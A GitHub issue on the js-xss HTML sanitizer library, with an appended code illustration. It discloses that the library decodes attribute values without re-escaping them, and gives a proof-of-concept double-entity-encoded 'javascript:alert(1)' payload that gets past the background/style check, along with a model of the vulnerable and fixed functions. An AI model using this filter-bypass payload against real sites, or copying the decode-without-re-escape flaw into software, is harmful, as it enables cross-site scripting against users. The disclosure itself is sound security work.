leizongmin / js-xss

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist
http://jsxss.com

Lack of re-escaping the original attribute value(bypassing the check for XSS in background/style) #180

Open potetisensei opened 4 years ago

potetisensei commented 4 years ago

In safeAttrValue, we can see that friendlyAttrValue unescapes the attribute value. https://github.com/leizongmin/js-xss/blob/master/lib/default.js#L149

At the end of this function, however, the unescaped value is not "re-escaped", which results in the bypass of the check for XSS in background or style attributes.

Here is the PoC:

var xss = require("xss");
// Double-encoded "javascript:alert(1)": each character of the entity-encoded
// string is itself encoded once more as a decimal entity.
var html = "<body background=&#38;&#35;&#49;&#48;&#54;&#59;&#38;&#35;&#57;&#55;&#59;&#38;&#35;&#49;&#49;&#56;&#59;&#38;&#35;&#57;&#55;&#59;&#38;&#35;&#49;&#49;&#53;&#59;&#38;&#35;&#57;&#57;&#59;&#38;&#35;&#49;&#49;&#52;&#59;&#38;&#35;&#49;&#48;&#53;&#59;&#38;&#35;&#49;&#49;&#50;&#59;&#38;&#35;&#49;&#49;&#54;&#59;&#38;&#35;&#53;&#56;&#59;&#38;&#35;&#57;&#55;&#59;&#38;&#35;&#49;&#48;&#56;&#59;&#38;&#35;&#49;&#48;&#49;&#59;&#38;&#35;&#49;&#49;&#52;&#59;&#38;&#35;&#49;&#49;&#54;&#59;&#38;&#35;&#52;&#48;&#59;&#38;&#35;&#52;&#57;&#59;&#38;&#35;&#52;&#49;&#59;></body>";

// Allow only the background attribute on body, so it goes through safeAttrValue.
var options = {};
options.whiteList = {
  "body": ["background"]
};
html = xss(html, options);
console.log(html);

The above code emits the following html code: <body background="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"></body>

Since we should no longer care about Internet Explorer, this is not a big problem I think.
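The following is an added model of the gap described in this issue and of the re-escaping that closes it; it is not js-xss code, all function names (decodeEntities, escapeAttr, isJavascriptUrl, safeAttrValueVulnerable, safeAttrValueFixed, browserDecodes, encodeDecimal) are hypothetical, and the payload is rebuilt from the PoC above rather than copied:

```javascript
// Added illustration of the re-escaping gap described in this issue; not js-xss code.
// All function names here are hypothetical.

// Decode one layer of HTML entities: &#NN;, &#xHH; and a few named ones.
function decodeEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, body) => {
    if (body[0] !== "#") return named[body.toLowerCase()] ?? m;
    const isHex = body[1].toLowerCase() === "x";
    const code = parseInt(body.slice(isHex ? 2 : 1), isHex ? 16 : 10);
    return code <= 0x10ffff ? String.fromCodePoint(code) : m;
  });
}

// Re-escape a value for placement inside a double-quoted attribute.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// The check both variants share: a javascript: URL once whitespace/controls are stripped.
function isJavascriptUrl(decoded) {
  return /^javascript:/i.test(decoded.replace(/[\s\x00-\x1f]/g, ""));
}

// Vulnerable shape (as reported): unescape, check, emit the unescaped value as-is.
function safeAttrValueVulnerable(value) {
  const decoded = decodeEntities(value);
  return isJavascriptUrl(decoded) ? "" : decoded;
}

// Fixed shape: same check, but the output is re-escaped, so entity syntax that
// survived the first decode is shown literally instead of decoded by the browser.
function safeAttrValueFixed(value) {
  const decoded = decodeEntities(value);
  return isJavascriptUrl(decoded) ? "" : escapeAttr(decoded);
}

// What the browser does with the emitted attribute value: one more decode pass.
function browserDecodes(attrValue) {
  return decodeEntities(attrValue);
}

// Constructed input reproducing the PoC: "javascript:alert(1)" as decimal
// entities, then that string encoded again (&#38;&#35;&#49;... is "&#1...").
function encodeDecimal(s) {
  return [...s].map((c) => "&#" + c.charCodeAt(0) + ";").join("");
}
const doubleEncodedPayload = encodeDecimal(encodeDecimal("javascript:alert(1)"));
```

Run against doubleEncodedPayload, the vulnerable variant passes the check yet the browser's own decode turns the emitted attribute into a javascript: URL, while the fixed variant leaves the browser with a literal entity string that is not a URL at all.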